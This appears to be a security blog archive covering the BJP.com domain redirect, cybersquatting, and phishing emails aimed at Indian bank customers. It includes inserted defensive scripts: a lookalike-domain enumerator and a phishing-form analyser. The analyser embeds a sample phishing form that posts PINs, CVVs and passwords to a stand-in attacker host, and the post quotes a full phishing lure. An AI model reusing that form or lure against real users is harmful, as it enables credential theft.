Category Archives: Security

BJP vs Congress Domain War

Indian politicians now take their war to the cyberspace. The ruling Indian National Congress party and the main opposition party Bharatiya Janata Party (BJP) are embroiled in a bitter war over domain redirection of BJP.COM


Congress Vs BJP on BJP.COM

It all started on October 3rd, when an HTTP request to http://bjp.com would redirect to the Congress party’s website. It appears that some smart bloke (read: cyber savvy) at Congress, or a prankster, set up this redirection.

However, Congress now appears to have taken a step back, with a request to http://bjp.com now landing on a parked page with ads. A Whois search for the owners of http://bjp.com is privacy-protected, meaning the contacts have decided not to disclose their details in public. The Whois record reveals that the registration was further updated on October 4th (stopping the redirection to the INC website), and this could be owing to the legal notice or pressure from BJP accusing Congress of cyber theft / cyber fraud.

But what was the Bharatiya Janata Party – BJP doing all this time? A lookup* at the history of this site reveals that it has been online since 1998 and has changed ownership and content since then. The last time this page was updated was in 2008. From February 1998 to 2008 it was used by the Brighton Journal of Philosophy (BJP) for their online philosophy journal. So the Bharatiya Janata Party did not bother to claim ownership of this domain, if they considered http://BJP.COM to be their intellectual property, until Congress capitalized on this.

The Bharatiya Janata Party might still need to watch out and take action quickly, as other combinations of BJP are parked and might be available for sale. It's a hassle, as even a simple typo might lead to a different website, and with the blackhat SEO techniques in use these days a lookalike might even outrank the legitimate domain if someone were to search for it.

This might serve as a reminder to many that unless you act fast and claim the ownership of your related assets online (domain names, twitter handles and other Social Networking site presence), people are just waiting to hijack them.
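The two paragraphs above describe the exposure: neighbouring spellings of a brand's domain sit parked or for sale, and a brand owner who does not claim them first is left watching. The script below is an added example (not from the original post) of how a brand owner can enumerate the single-edit lookalikes of its own label and sort them into "held by us", "held by a third party" and "still unregistered". The registry snapshot in HELD_BY_BRAND and HELD_BY_OTHERS is constructed for the example; in practice those sets would be filled from Whois or DNS lookups.

```python
"""Enumerate lookalike domains of a brand label so the owner can register or
monitor them. Added example, not from the original post; the "who holds what"
data below is constructed, in practice it comes from Whois/DNS lookups."""


def lookalike_labels(label):
    """Single-edit variants of `label`: omissions, transpositions,
    repeated characters and hyphen insertions."""
    label = label.lower()
    variants = set()
    for i in range(len(label)):
        variants.add(label[:i] + label[i + 1:])                 # omission
        variants.add(label[:i] + label[i] + label[i:])          # repetition
    for i in range(len(label) - 1):
        variants.add(label[:i] + label[i + 1] + label[i] + label[i + 2:])  # transposition
    for i in range(1, len(label)):
        variants.add(label[:i] + "-" + label[i:])               # hyphen
    variants.discard(label)
    variants.discard("")
    return variants


def candidate_domains(label, tlds=("com", "org", "net", "in")):
    """The brand label itself plus every lookalike, across the given TLDs."""
    labels = lookalike_labels(label) | {label.lower()}
    return sorted(f"{name}.{tld}" for name in labels for tld in tlds)


def triage(candidates, held_by_brand, held_by_others):
    """Split candidates into what the brand holds, what third parties hold
    (to watch or dispute), and what is still free to register."""
    ours = sorted(d for d in candidates if d in held_by_brand)
    theirs = sorted(d for d in candidates if d in held_by_others)
    free = sorted(d for d in candidates
                  if d not in held_by_brand and d not in held_by_others)
    return {"ours": ours, "third_party": theirs, "unregistered": free}


# Constructed registry snapshot for the example (not real Whois data).
HELD_BY_BRAND = {"bjp.org"}
HELD_BY_OTHERS = {"bjp.com", "bjp.net", "bjp.in"}

if __name__ == "__main__":
    report = triage(candidate_domains("bjp"), HELD_BY_BRAND, HELD_BY_OTHERS)
    for bucket, names in report.items():
        print(f"{bucket}: {len(names)} -> {', '.join(names[:6])}")
```

The "third_party" bucket is the watch list (parked pages, redirects, lookalike content), and the "unregistered" bucket is what can still be claimed cheaply before someone else does.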

Cybersquatting is the common term for the practice where a third party buys and claims ownership of domain names that would ideally belong to the respective businesses, people, etc. These cybersquatters charge a fortune to give up their squatting rights if a legal course is not favorable to those who legitimately own the name.

Some time back, the single-bench Cyber Tribunal appellate in India asked the owners of the travel portal http://oktatabyebye.com, owned by MakeMyTrip, to give up their ownership of the domain and relinquish it to Tata Sons because it contained the word Tata. It looks like this case may not be over, as the OkTataByeBye.com folks have put up a request for ‘support and help’ to retain this domain. You can read the request page HERE.

* Source: Internet Archive

Phishing attack leveraging SMS ban


This morning was going just as usual till I noticed an email. It seemed to originate from AXIS bank, it had an HTML attachment and it was an important announcement.

The contents of the email looked valid, considering the Government of India had placed a ban on sending bulk SMS till the 29th. Now I am not sure if such a ban holds good for financial institutions. But some smart bloke seems to have capitalized on this ban. The email stated that:

“In view of the Govt. of India directive to mobile operators, all the corporate sms messaging services have been blocked for the next 72 hours. This period may increase. In view of this exigency, Axis Bank Net Secure Code and transaction alerts delivery has been effected. Therefore, till the Govt. of India permits restoration of the system. 

Axis Bank customers may not be able to conduct Internet Banking transactions that use SMS for delivering the NetSecure code. This is a regulation by Govt. of India and beyond Axis Bank’s control.

We have attached a form to this email. Please DOWNLOAD the form attached to this email so that you can fill and submit it Online to us , so that we can verify your account , After the Govt. of India permits restoration of the system. .
NOTE: The form needs to be opened in a modern browser which has javascript enabled ( Internet Explorer 7, Firefox 3, Safari 3, Opera 9)”

Now, unlike the other phishing emails that I have encountered, this one seemed different, and the content (read: grammar) also looks more like it came from a professional agency and is in tandem with the events that are happening in India.

This is the snapshot of the email:


Phishing Email targetting Axisbank


I opened the HTML attachment after a customary scan from the AV. Now although this looks authentic, it is a bit suspicious because it is asking for too many private details, which should evoke second thoughts from anybody. Generally any phishing attack would ask for username, password and CVV details at the most. But this one is prompting for ATM PIN, transaction password, Secure Code/Verified by Visa and email details. And unlike others, where you enter the details on a site, it is sending an attachment to be filled in and submitted. The modus operandi is slightly different.

I bet someone who is familiar with Axis Bank’s online transaction mechanism has set this up, because Axis Bank requires a transaction password in addition to the details mentioned above for an online transaction. Now, the form is an HTML attachment, and when you open it everything looks authentic; just take a look below.


Phishing HTML attachment targetting Axis bank

This is it, but once you look at the page source carefully you will realize the bait. Using the POST method, all details would go to the URL specified in the form instead of to Axis Bank:


Phishing URL targetting Axis bank
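The tell described above (a form whose action posts the filled-in details to a domain that is not the bank's, and which asks for fields a bank would never collect) can be checked mechanically rather than by eyeballing the page source. The script below is an added example, not code from the original post: it parses an HTML attachment, extracts every form action and the input names inside it, and reports forms that post outside the expected domain or request PIN/CVV/transaction-password style fields. The sample attachment and the collector URL are constructed stand-ins (the real phishing URL from the post is not reproduced), and "axisbank.com" is assumed as the bank's legitimate domain.

```python
"""Flag a phishing HTML attachment whose form posts to a foreign domain or
asks for credentials a bank never collects. Added example, not from the
original post; SAMPLE_ATTACHMENT and its collector URL are constructed."""
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed sample: looks like a bank verification form, posts elsewhere.
SAMPLE_ATTACHMENT = """
<html><body>
<h1>Axis Bank - Account Verification</h1>
<form method="POST" action="http://collector.example-attacker.test/submit.php">
  Customer ID: <input name="customer_id">
  Login password: <input type="password" name="login_password">
  Transaction password: <input type="password" name="txn_password">
  ATM PIN: <input type="password" name="atm_pin">
  CVV: <input name="cvv">
  Email password: <input type="password" name="email_password">
  <input type="submit" value="Submit">
</form>
</body></html>
"""

# Substrings of field names that no bank web form should ever request.
SENSITIVE_FIELDS = ("pin", "cvv", "txn_password", "transaction", "email_password")


class FormCollector(HTMLParser):
    """Collect every <form> action/method and the input names inside it."""

    def __init__(self):
        super().__init__()
        self.forms = []
        self._current = None

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":
            self._current = {"action": a.get("action") or "",
                             "method": (a.get("method") or "GET").upper(),
                             "fields": []}
            self.forms.append(self._current)
        elif tag == "input" and self._current is not None:
            name = a.get("name")
            if name and (a.get("type") or "text").lower() != "submit":
                self._current["fields"].append(name)

    def handle_endtag(self, tag):
        if tag == "form":
            self._current = None


def registrable_domain(host):
    """Crude registrable domain: last two labels (no public-suffix handling)."""
    parts = host.lower().split(".")
    return ".".join(parts[-2:]) if len(parts) >= 2 else host.lower()


def analyse_attachment(html, expected_domain):
    """Return findings for forms that post outside expected_domain or that
    request sensitive fields. An empty list means nothing suspicious found."""
    parser = FormCollector()
    parser.feed(html)
    findings = []
    for form in parser.forms:
        host = urlparse(form["action"]).hostname or ""
        if not host:
            findings.append("form has a relative or empty action")
        elif registrable_domain(host) != expected_domain.lower():
            findings.append(f"form posts to foreign domain: {host}")
        sensitive = [f for f in form["fields"]
                     if any(k in f.lower() for k in SENSITIVE_FIELDS)]
        if sensitive:
            findings.append(f"form requests sensitive fields: {', '.join(sensitive)}")
    return findings


if __name__ == "__main__":
    for finding in analyse_attachment(SAMPLE_ATTACHMENT, "axisbank.com"):
        print("FINDING:", finding)
```

Run it against any .html attachment by reading the file into a string and passing the bank's real domain; a form that posts to the bank's own domain and asks only for a customer ID and login password produces no findings, which is the baseline a mail gateway or analyst can compare against.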


A Whois lookup for the domain above lists it as being based out of Poland. All I can do is notify Axis Bank of this. It would have been better if the Government of India or the financial institutions had made it clear whether their services would continue to operate or be impeded due to this SMS ban.

Take care, and please spread the word to ensure people do not fall for this.

UPDATE:

I would have thought that the content in their email was written by a smart bloke, but it’s actually flicked from Axis Bank’s login page!

11 October

Received another phishing email with a similar modus operandi, this time targeting ICICI Bank and hosted at:


Phishing email targeting ICICI customers

17th October

Another day, another phishing email. The phishers are just not leaving any stone unturned as they target every bank with an online presence, this time targeting customers of HDFC Bank and hosted at:


Phishing email targeting HDFC Bank customers

Here is the phished URL:


Phishing email targeting HDFC Bank customers

Oh wait... I think I just saw a similar email targeting Punjab National Bank’s customers land in my inbox!